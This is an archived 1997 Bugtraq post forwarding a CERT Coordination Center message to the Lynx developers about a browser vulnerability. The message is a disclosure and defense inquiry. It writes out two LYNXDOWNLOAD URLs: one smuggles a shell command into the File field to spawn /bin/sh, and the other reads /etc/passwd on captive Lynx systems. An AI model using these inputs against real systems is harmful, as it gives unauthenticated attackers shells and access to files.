Bugtraq mailing list archives
msg00234.html
From: brush () SEARCH POL PL (brush () SEARCH POL PL)
Date: Thu, 17 Jul 1997 16:42:22 -0000
_________________________________________________________________ [Prev][Next][Index][Thread] LYNX-DEV VU#5135 (Lynx vulnerability?) (fwd) _________________________________________________________________ * To: Lynx Development <lynx-dev () sig net> * Subject: LYNX-DEV VU#5135 (Lynx vulnerability?) (fwd) * From: Duncan Hill <dhill () sunbeach net> * Date: Tue, 24 Jun 1997 07:56:04 +0400 (GMT-4) * cc: Roger Hill <rhill () stobyn ml org> * Reply-To: lynx-dev () sig net * Sender: owner-lynx-dev () quartz netop sig net _________________________________________________________________ I'm not sure if the entire list got this. I got it because I'm still subscribed to the raven list :) So, here it is in case nobody's seen it yet. Duncan Hill ------------------------------------------------------------------------------ ---------- Forwarded message ---------- Date: Mon, 23 Jun 1997 17:52:06 -0400 (EDT) From: "CERT(sm) Coordination Center" <cert () cert org> Reply-To: lynx-dev () raven cc ukans edu To: Lynx Developers <lynx-dev () raven cc ukans edu> Cc: "CERT(sm) Coordination Center" <cert () cert org> Subject: VU#5135 (Lynx vulnerability?) -----BEGIN PGP SIGNED MESSAGE----- Hello folks, We have received a report of a potential vulnerability with lynx, which we wanted to check with you on. When you start up a lynx client session, you can hit "g" (for Goto) and then enter the following URL: URL to open: LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/ dev/null Enter a filename: /dev/null File exists. Overwrite? (y/n) y This then gives a shell on the client machine on which the lynx process is executing. Similarly, you can copy and inspect arbitrary files on the local system thus: LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdout Enter a filename: /dev/stdout File exists. Overwrite? (y/n) y This returns a copy of the /etc/password file to the user's browser session. Normally this may not be a problem if you are executing lynx from your local account on your workstation. However, if you are running lynx as a captive information service (as discussed on the lynx man page), then this means that an attacker can run arbitrary commands and inspect arbitrary files on the victim system without authorization. We are aware of one site where you can telnet to the system, and without any authentication process, the user is given a lynx browser session. By entering the URL above, an attacker would then be able to obtain an interactive shell on that system without having been authenticated. We would be interested in knowing whether this is a known problem. The reporter suggested that disabling downloads would be an appropriate workaround. If you are in agreement with this, is this a feature that is enabled by default? (This would require the captive session to be started using the "-restrictions=download" option, wouldn't it?) If this is a known problem, have you any suggestions as to the solution, or any idea whether patches are (or would be) available to address these problems? We would appreciate any feedback that you may have on these questions. Thanks very much for your time. Regards, Rob. | Rob McMillan Email: cert () cert org || CERT Coordination Center (*) Phone: +1 (412) 268 7090 (24 x 7) ||| Software Engineering Institute Fax: +1 (412) 268 6989 |||| Carnegie Mellon University Web: http://www.cert.org ||||| Pittsburgh, Pa. 15213-3890 Timezone: GMT-5 (EST) * CERT is registered with the U.S. Patent and Trademark Office. The Software Engineering Institute is sponsored by the U.S. Department of Defense. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBM67vzXVP+x0t4w7BAQGFjQP9FEqS0OicRpyWTzd6e9MHj26XBWWfb9Kw izdrbMhkH/KOYnUF1Cq+1QeIb0DbeipBNTVJLXFRBoT0Ztk+e5loH+Ggr8zRU/sn dH9R2fS88F0XWtX7MXvFuiVIq5EtkoPXZc59FvvTC45qWub7+m5wW8Gb1wOvfXIs tT1YSXP1vxE= =86zo -----END PGP SIGNATURE----- ; ; To UNSUBSCRIBE: Send a mail message to majordomo () sig net ; with "unsubscribe lynx-dev" (without the ; quotation marks) on a line by itself. ; _________________________________________________________________ Follow-Ups: * Re: LYNX-DEV VU#5135 (Lynx vulnerability?) (fwd) + From: Andrew Kuchling <amk () magnet com> _________________________________________________________________ * Prev: Re: LYNX-DEV VU#5135 (Lynx vulnerability?) (fwd) * Next: LYNX-DEV Missing people * Index(es): + Main + Thread _________________________________________________________________ Lynx mailing list archives [FLORA HOME] [LYNX Home]
Current thread:
- Re: Vulnerability in Glimpse HTTP, (continued)
- Re: Vulnerability in Glimpse HTTP Martin Pool (Jul 10)
- It's not over yet. Aleph One (Jul 11)
- It's not over yet. Manley, Jim W (Jul 11)
- More information about JavaScript bug Dominick Matthias PN OIL 6 (Jul 11)
- new post SP3 hotfix: lm-fix Alex Libenson (Jul 12)
- Minor PGP vulnerability Harald Weidner (Jul 15)
- GetAdmin - Hotfix silent release ? Olivier Gerschel (Jul 16)
- Re: Minor PGP vulnerability Lucky Green (Jul 16)
- CERT Advisory CA-97.21 - SGI Buffer Overflow Vulnerabilities Aleph One (Jul 17)
- slight misinformation in CA-97.21 Dave Kormann (Jul 17)
- msg00234.html brush () SEARCH POL PL (Jul 17)
- CERT Vendor-Initiated Bulletin VB-97.05 - Vul in Lynx Temporary Aleph One (Jul 16)
- Sun Security Bulletin #00146 Aleph One (Jul 16)
- Sun CDE 1.0.1: login bug Isaac (Jul 28)
- Re: Sun CDE 1.0.1: login bug Doug Hughes (Jul 29)
- CERT Vendor-Initiated Bulletin VB-97.06 - Vul in Lynx Downloading Aleph One (Jul 16)
- Re: [linux-security] so-called snprintf() in db-1.85.4 (fwd) Joe Zbiciak (Jul 10)
- A New Fragmentation Attack Aleph One (Jul 10)